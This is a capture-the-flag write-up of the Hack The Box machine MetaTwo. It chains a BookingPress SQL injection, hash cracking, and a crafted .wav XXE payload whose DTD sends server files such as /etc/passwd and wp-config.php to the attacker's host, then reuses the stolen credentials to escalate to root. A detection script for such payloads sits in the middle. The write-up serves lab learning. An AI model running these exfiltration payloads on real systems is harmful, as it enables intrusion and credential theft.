MetaTwo
MetaTwo is an easy Linux machine from Hack The Box. Here is the tl;dr:

- There is a WordPress site with a vulnerable plugin called BookingPress that we can take advantage of to get a username and password for a WordPress user.
- Once we're logged in, we're able to upload media. There is a vulnerability in the version of WordPress on the box that lets us upload a malicious `.wav` file and download files from the server.
- We are able to find a `wp-config` file on the server with credentials that allow us to ssh in as a user named `jnelson`.
- In `jnelson`'s home directory is a hidden folder called `.passpie` with a PGP key and some encrypted messages. We're able to crack the key with `john` and get the password for `passpie`, which is a command line password manager.
- We run `passpie` and are able to export the password for `root`.
Enumeration
nmap
Let's start off with an nmap scan. It looks like we have three ports open: `21`, `22` and `80`.

```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2]
└─$ nmap 10.10.11.186
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 23:14 MST
Nmap scan report for metapress.htb (10.10.11.186)
Host is up (0.064s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
```
The first thing I tried was logging into ftp as anonymous, but it looks like it's not working. So let's switch over to the web server. It doesn't load, but it does show us that the domain name is `metapress.htb`, so let's add it to our `/etc/hosts` file.

Now the page does load, and it looks like it's running WordPress. If we view the source code we can see that it's running version `5.6.2`.

We can also see there is an events page where you can schedule an event. It doesn't look like a standard WordPress feature, so let's see if we can find the name of the plugin being used. If you view the source you'll be able to see that it is using the plugin called BookingPress 1.0.10. A quick Google search shows that there is a known SQL injection vulnerability in this version.
Foothold
After a quick Google search, I found an exploit for the BookingPress plugin. There are a few others, but this one was quick and worked well. To run it, we just need to provide it with the URL and the nonce, which can be found by viewing the source code on the events page.

```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ python3 bp_exploit.py --url http://metapress.htb -n 690776adac
- BookingPress PoC
-- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1
-- Count of users: 2
|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|
```
Just like that we have two usernames with their emails and password hashes. I put the admin hash into an online hash analyzer and it identified it as an MD5 WordPress hash. Let's run it through hashcat and see if we can crack it.
Crack the hash
```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ hashcat -O -m 400 -a 0 -o cracked.txt meta.hashes /usr/share/wordlists/rockyou.txt

┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ cat cracked.txt
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
```

I was not able to crack the `admin` password, but it cracked the password for `manager` right away. Let's head on over to `metapress.htb/wp-admin` and see what we can do.
We are able to log in, but it doesn't seem like we have access to do very much. There is one interesting thing that catches my eye right away though: we can upload new media. The first thing I did was try uploading `.php` and `.phar` files, but it looks like we are restricted in what kind of files we can upload.
XXE Vulnerability and exploit
We did find a WordPress version earlier (5.6.2), so let's see where that takes us. A quick search led me to a blog post about a WordPress XXE vulnerability in the Media Library. Sounds promising! Long story short, we need to create a malicious `.wav` file (a file type we are able to upload) that will send files from the server back to a PHP server on our own machine.

Let's start off by creating the `.wav` file that we'll upload to WordPress.

```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.4:7002/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```
We also need to create a DTD file to host on our machine and set up our PHP server. This attempt will hopefully send us the `/etc/passwd` file from the metapress.htb server, base64-encoded, back to our server.

```xml
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.4:7001/?p=%file;'>" >
```
```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ php -S 0.0.0.0:7001
[Wed Mar  8 22:30:09 2023] PHP 8.1.12 Development Server (http://0.0.0.0:7001) started
```
Now we should be all set to upload our `payload.wav` file and see what happens!
```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ php -S 0.0.0.0:7001
[Wed Mar  8 22:30:09 2023] PHP 8.1.12 Development Server (http://0.0.0.0:7001) started
[Wed Mar  8 22:31:00 2023] 10.10.11.186:48716 Accepted
[Wed Mar  8 22:31:00 2023] 10.10.11.186:48716 [200]: GET /evil.dtd
[Wed Mar  8 22:31:00 2023] 10.10.11.186:48716 Closing
[Wed Mar  8 22:31:00 2023] 10.10.11.186:48722 Accepted
[Wed Mar  8 22:31:00 2023] 10.10.11.186:48722 [404]: GET /?p=[base64 blob omitted] - No such file or directory
[Wed Mar  8 22:31:00 2023] 10.10.11.186:48722 Closing
```
Success! Now let's decode the base64 and grep for users that can log in. We find `root` and `jnelson`. That might come in handy later, and now we know our attack is working.
```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ base64 -d passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
```
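What makes the upload above dangerous is that the media library hands the file to the getID3 metadata parser, which reads the `iXML` text chunk of a WAVE container and resolves the DTD it finds there. A hardened upload pipeline (or an after-the-fact sweep of `wp-content/uploads`) can walk the RIFF chunks itself and refuse any text chunk carrying DOCTYPE or entity declarations, which no legitimate broadcast-metadata block needs. The following Python is an added example for that check; it is not code from the writeup or from WordPress. The sample WAVE files and the `attacker.invalid` host are constructed here for the demonstration.

```python
import struct
from typing import Iterator, List, Optional, Tuple

# DTD constructs that a benign iXML/BWF metadata chunk has no reason to contain.
# A DOCTYPE with an external SYSTEM entity is exactly what the payload above uses.
SUSPICIOUS_MARKERS = (b'<!DOCTYPE', b'<!ENTITY', b'SYSTEM', b'PUBLIC')


def iter_riff_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Walk the top-level chunks of a RIFF/WAVE container, yielding (tag, body)."""
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'WAVE':
        raise ValueError('not a RIFF/WAVE file')
    pos = 12
    while pos + 8 <= len(data):
        tag = data[pos:pos + 4]
        size = struct.unpack_from('<I', data, pos + 4)[0]
        body = data[pos + 8:pos + 8 + size]   # tolerates a size field that overruns the file
        yield tag, body
        pos += 8 + size + (size & 1)          # chunk bodies are padded to an even length


def scan_wav_for_xxe(data: bytes) -> List[Tuple[str, List[str]]]:
    """Return [(chunk_tag, [markers found])] for every XML chunk that carries DTD constructs."""
    findings = []
    for tag, body in iter_riff_chunks(data):
        if tag in (b'fmt ', b'data'):
            continue                          # audio format/samples, never text metadata
        if not body.lstrip().startswith(b'<'):
            continue                          # not XML-looking, nothing for getID3 to parse
        hits = [m.decode() for m in SUSPICIOUS_MARKERS if m in body]
        if hits:
            findings.append((tag.decode('ascii', 'replace'), hits))
    return findings


def build_wav(ixml: Optional[bytes]) -> bytes:
    """Assemble a minimal PCM WAVE file; used here only to construct test inputs."""
    def chunk(tag: bytes, body: bytes) -> bytes:
        return tag + struct.pack('<I', len(body)) + body + (b'\x00' if len(body) & 1 else b'')
    fmt = struct.pack('<HHIIHH', 1, 1, 8000, 16000, 2, 16)   # PCM, mono, 8 kHz, 16-bit
    chunks = chunk(b'fmt ', fmt) + chunk(b'data', b'\x00' * 4)
    if ixml is not None:
        chunks += chunk(b'iXML', ixml)
    return b'RIFF' + struct.pack('<I', 4 + len(chunks)) + b'WAVE' + chunks


# Constructed samples (not captured from the box): a benign BWF iXML block and one
# shaped like the payload above, pointing at a placeholder host.
BENIGN_IXML = b'<?xml version="1.0"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>'
MALICIOUS_IXML = (b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
                  b"'http://attacker.invalid/evil.dtd'>%remote;%init;%trick;]>")

if __name__ == '__main__':
    for label, payload in (('plain', None), ('benign iXML', BENIGN_IXML), ('XXE iXML', MALICIOUS_IXML)):
        print(f'{label:12s} -> {scan_wav_for_xxe(build_wav(payload))}')
```

The walker deliberately does not trust the chunk size field: the payload on this page declares `0x7b` bytes for a shorter body, and a parser that raised on that mismatch would be easy to bypass by padding. The same idea applies to any other container whose metadata is XML (MP4 `XMP`, ID3 frames); the fix on the server side is to keep getID3 updated and to run the metadata parser with external entity loading disabled.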
Now that we are able to read files from the server, let's see if we can find some more credentials. It is a WordPress site, so the `wp-config.php` file might be a good place to look. We don't know the path to it yet, but we do know it's running on nginx, so let's try this.

```xml
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/nginx/sites-enable/default">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.4:7001/?p=%file;'>" >
```
After uploading our payload again, we can decode the response and see the path to the `wp-config.php` file.

```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ base64 -d nginx
server {
    listen 80;
    listen [::]:80;

    root /var/www/metapress.htb/blog;
    index index.php index.html;

    if ($http_host != "metapress.htb") {
        rewrite ^ http://metapress.htb/;
    }

    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;
    }

    location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
        expires max;
        log_not_found off;
    }
}
```
Let's update the `evil.dtd` file to get the `/var/www/metapress.htb/blog/wp-config.php` file. Once we decode it we get some new creds for the database and for the ftp server.

```php
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
```
ftp
After logging in to the ftp server, we see a directory called `mailer` with two files. One of them is called `send_email.php` and contains creds for our `jnelson` user.

```php
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;
```
Let's try ssh with that password. We're in and are able to grab the user flag!

```
└─$ ssh jnelson@metapress.htb
jnelson@metapress.htb's password:
Linux meta2 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 25 12:51:26 2022 from 10.10.14.23
jnelson@meta2:~$
```
Privesc
Let's run linpeas and see what it can tell us. I started by downloading the latest build and spinning up a basic Python web server, then used `wget` to download `linpeas.sh` into the `/dev/shm` folder and ran `chmod +x` on the script so that we can execute it. I originally tried putting it in `/tmp`, but there must be some kind of cleanup script running because it was deleted right away.

```
jnelson@meta2:/tmp$ wget http://10.10.14.4/linpeas.sh
--2023-03-09 06:18:38--  http://10.10.14.4/linpeas.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh  100%[==============================================================================>] 808.69K  1.64MB/s    in 0.5s

2023-03-09 06:18:39 (1.64 MB/s) - ‘linpeas.sh’ saved [828098/828098]

jnelson@meta2:/tmp$ chmod +x linpeas.sh
```
passpie
After running it, the first thing that catches my eye is these possible SSH keys in a hidden directory called `./passpie`. With a little Google searching we learn that `passpie` is a command line password manager. Sounds promising!

```
══╣ Possible private SSH keys were found!
/home/jnelson/.passpie/.keys
```
In the `.passpie` directory we find two files: `.config`, which is blank, and `.keys`, which contains PGP public and private keys. In the `ssh` directory we find two more files, `jnelson.pass` and `root.pass`. These files look like they contain encrypted passwords.

Let's try cracking the private key. First we need to save just the private key portion, then use `gpg2john` to convert it to a format we can use with `john`.

```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/pgp]
└─$ gpg2john pgp.priv > gpg.john

File pgp.priv
```
Then let's run it through `john`, and we get the password `blink182` for Passpie.

```
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/pgp]
└─$ john -w=/usr/share/wordlists/rockyou.txt for.john
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
No password hashes left to crack (see FAQ)

┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/pgp]
└─$ john --show for.john
Passpie:blink182:::Passpie (Auto-generated by Passpie) <passpie@local>::pgp.priv

1 password hash cracked, 0 left
```
root!
In the GitHub repo for `passpie`, we can see all of the commands we can run in passpie, and it looks like we can export the passwords by running `passpie export passwords` (note: `passwords` is just the name of the file you want to export the passwords into).

```
jnelson@meta2:~$ passpie export passwords
Passphrase:
jnelson@meta2:~$ ls
passwords  user.txt
jnelson@meta2:~$ cat passwords
credentials:
- comment: ''
  fullname: root@ssh
  login: root
  modified: 2022-06-26 08:58:15.621572
  name: ssh
  password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
  fullname: jnelson@ssh
  login: jnelson
  modified: 2022-06-26 08:58:15.514422
  name: ssh
  password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0
```
Simply `su` to root, enter the password and we're in!

```
jnelson@meta2:~$ su root
Password:
root@meta2:/home/jnelson# cd /root
root@meta2:~# cat root.txt
a1527462a13eb47b516c1375a2e7d218
root@meta2:~#
```